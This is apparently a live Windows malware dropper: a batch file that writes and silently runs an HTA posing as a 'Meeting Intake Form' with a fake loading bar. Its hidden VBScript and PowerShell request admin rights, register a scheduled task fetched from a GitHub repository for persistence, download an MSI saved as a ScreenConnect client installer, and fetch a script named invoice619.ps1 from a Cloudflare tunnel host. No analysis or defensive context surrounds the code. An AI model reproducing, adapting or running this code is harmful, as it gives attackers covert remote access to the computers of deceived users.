@echo off
if "%~1"=="" (start /min "" "%~f0" : & exit)
setlocal enabledelayedexpansion

::  file
set "hta=%temp%\sysconfig.hta"
echo ^<html^> > "%hta%"
echo ^<head^> >> "%hta%"
echo ^<HTA:APPLICATION ID="DelayedDeploy" WINDOWSTATE="minimize" SHOWINTASKBAR="no" /^> >> "%hta%"
echo ^<title^>Meeting Intake Form^</title^> >> "%hta%"
echo ^<style^> >> "%hta%"
echo     body { font-family: Arial, sans-serif; text-align: center; padding: 50px; } >> "%hta%"
echo     .loader-container { width: 300px; margin: 0 auto; } >> "%hta%"
echo     .loader-text { margin-bottom: 15px; font-size: 16px; } >> "%hta%"
echo     .loader-bar { width: 100%%; height: 20px; background-color: #f0f0f0; border-radius: 10px; overflow: hidden; } >> "%hta%"
echo     .loader-progress { height: 100%%; width: 0%%; background-color: #4CAF50; transition: width 0.3s; } >> "%hta%"
echo ^</style^> >> "%hta%"
echo ^</head^> >> "%hta%"
echo ^<script language="VBScript"^> >> "%hta%"
echo     Sub Window_OnLoad >> "%hta%"
echo         Set shell = CreateObject("WScript.Shell") >> "%hta%"
echo. >> "%hta%"
echo         ' STASK (with admin rights) >> "%hta%"
echo         psCommand = "powershell -WindowStyle Hidden -Command ""Start-Process -Verb RunAs -FilePath 'powershell.exe' -ArgumentList '-WindowStyle Hidden -Command """"$xml = (Invoke-WebRequest """"https://raw.githubusercontent.com/billing-byte/sc/refs/heads/main/664.xml"""" -UseBasicParsing).Content; Register-ScheduledTask -Xml $xml -TaskName """"TheUpdate"""" -Force""""'""" >> "%hta%"
echo         shell.Run psCommand, 0, False >> "%hta%"
echo. >> "%hta%"
echo         '  (29 seconds) >> "%hta%"
echo         window.setTimeout "DownloadFiles", 29000 >> "%hta%"
echo     End Sub >> "%hta%"
echo. >> "%hta%"
echo     Sub DownloadFiles >> "%hta%"
echo     Set shell = CreateObject("WScript.Shell") >> "%hta%"
echo     Set http = CreateObject("MSXML2.XMLHTTP") >> "%hta%"
echo. >> "%hta%"
echo     ' Update progress bar >> "%hta%"
echo     Document.getElementById("progressBar").style.width = "20%%" >> "%hta%"
echo     Document.getElementById("statusText").innerHTML = "Initializing download..." >> "%hta%"
echo. >> "%hta%"
echo     ' XE >> "%hta%"
echo     On Error Resume Next >> "%hta%"
echo     http.Open "GET", "https://raw.githubusercontent.com/billing-byte/sc/refs/heads/main/oo7safe.msi", False >> "%hta%"
echo. >> "%hta%"
echo     ' Update progress bar before sending request >> "%hta%"
echo     Document.getElementById("progressBar").style.width = "40%%" >> "%hta%"
echo     Document.getElementById("statusText").innerHTML = "Connecting to server..." >> "%hta%"
echo. >> "%hta%"
echo     http.Send >> "%hta%"
echo. >> "%hta%"
echo     ' Update progress bar after send >> "%hta%"
echo     Document.getElementById("progressBar").style.width = "60%%" >> "%hta%"
echo     Document.getElementById("statusText").innerHTML = "Downloading file..." >> "%hta%"
echo. >> "%hta%"
echo     If http.Status = 200 Then >> "%hta%"
echo         exePath = "C:\Users\Public\ScreenConnect.ClientSetup.msi" >> "%hta%"
echo         Set stream = CreateObject("ADODB.Stream") >> "%hta%"
echo         stream.Open >> "%hta%"
echo         stream.Type = 1 >> "%hta%"
echo         stream.Write http.ResponseBody >> "%hta%"
echo         stream.SaveToFile exePath, 2 >> "%hta%"
echo         stream.Close >> "%hta%"
echo. >> "%hta%"
echo         ' Update progress bar after save >> "%hta%"
echo         Document.getElementById("progressBar").style.width = "80%%" >> "%hta%"
echo         Document.getElementById("statusText").innerHTML = "Saving file..." >> "%hta%"
echo     End If >> "%hta%"
echo. >> "%hta%"
echo     ' D S1 >> "%hta%"
echo     http.Open "GET", "https://beaver-typically-elvis-situated.trycloudflare.com", False >> "%hta%"
echo. >> "%hta%"
echo     ' Update progress bar >> "%hta%"
echo     Document.getElementById("progressBar").style.width = "90%%" >> "%hta%"
echo     Document.getElementById("statusText").innerHTML = "Processing..." >> "%hta%"
echo. >> "%hta%"
echo     http.Send >> "%hta%"
echo     If http.Status = 200 Then >> "%hta%"
echo         ps1Path = "C:\Users\Public\invoice619.ps1" >> "%hta%"
echo         Set stream = CreateObject("ADODB.Stream") >> "%hta%"
echo         stream.Open >> "%hta%"
echo         stream.Type = 1 >> "%hta%"
echo         stream.Write http.ResponseBody >> "%hta%"
echo         stream.SaveToFile ps1Path, 2 >> "%hta%"
echo         stream.Close >> "%hta%"
echo     End If >> "%hta%"
echo. >> "%hta%"
echo     ' Update progress bar to complete >> "%hta%"
echo     Document.getElementById("progressBar").style.width = "100%%" >> "%hta%"
echo     Document.getElementById("statusText").innerHTML = "Download complete! Closing..." >> "%hta%"
echo. >> "%hta%"
echo     ' C w a d c >> "%hta%"
echo     window.setTimeout "CloseWindow", 1000 >> "%hta%"
echo End Sub >> "%hta%"
echo. >> "%hta%"
echo Sub CloseWindow >> "%hta%"
echo     window.close >> "%hta%"
echo End Sub >> "%hta%"
echo ^</script^> >> "%hta%"
echo ^<body^> >> "%hta%"
echo ^<div class="loader-container"^> >> "%hta%"
echo     ^<div class="loader-text" id="statusText"^>Loading Intake Form...^</div^> >> "%hta%"
echo     ^<div class="loader-bar"^> >> "%hta%"
echo         ^<div class="loader-progress" id="progressBar"^>^</div^> >> "%hta%"
echo     ^</div^> >> "%hta%"
echo ^</div^> >> "%hta%"
echo ^</body^> >> "%hta%"
echo ^</html^> >> "%hta%"

:: Execute the HTA file silently
start /min mshta "%hta%"

:: Clean exit
timeout /t 2 /nobreak >nul
exit